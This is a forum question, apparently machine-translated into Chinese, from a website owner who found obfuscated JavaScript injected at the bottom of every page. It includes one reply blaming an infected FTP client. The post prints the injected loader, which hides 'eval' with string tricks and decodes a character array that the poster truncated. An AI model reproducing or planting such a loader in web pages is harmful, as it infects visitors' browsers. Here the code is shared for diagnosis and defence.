我们的网站托管在一个颇受欢迎的.NET托管服务提供商。所以我假设它是安全的,问题就在我们这边。如果我错了,请告诉我。
我收到了我网站的投诉,称其中有病毒。所以我去看主页。
我注意到在每个页面中,我们在页面底部都有以下额外的脚本!
<script>
try{document["b"+"o"+"d"+"y"]*=document}
catch(dgsgsdg){zxc=12;ww=window;}
try{d=document["createElement"]("span");}
catch(agdsg){zxc=0;}
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}
catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons
h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><script>try{window.document.body/=2}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons
h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"]
(parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}
</script></body>
只有我知道密码,而且我没有把它交给任何人。密码是随机的,符合安全标准,我们每年更改密码一次,我知道不常见,但我想这没关系。
问题是:
WTF是这个剧本吗?如何对n = [“9”......]数组进行反向工程?我想找个踪迹。
我们以什么方式搞砸了,让黑客进来?在这种情况下,除了布鲁斯强迫我们的密码之外他还能做到吗?
答案 0 :(得分:1)
“每个页面底部的代码段通常表示您的FTP程序已被感染,需要删除/更改.-- techfoobar”
虽然我不是100%肯定,但我认为techfoobar是正确的。我用来上传网站的FTP软件一定是被感染了。我不知道它是怎么发生的,但它已经崩溃,现在不再在操作系统中运行了。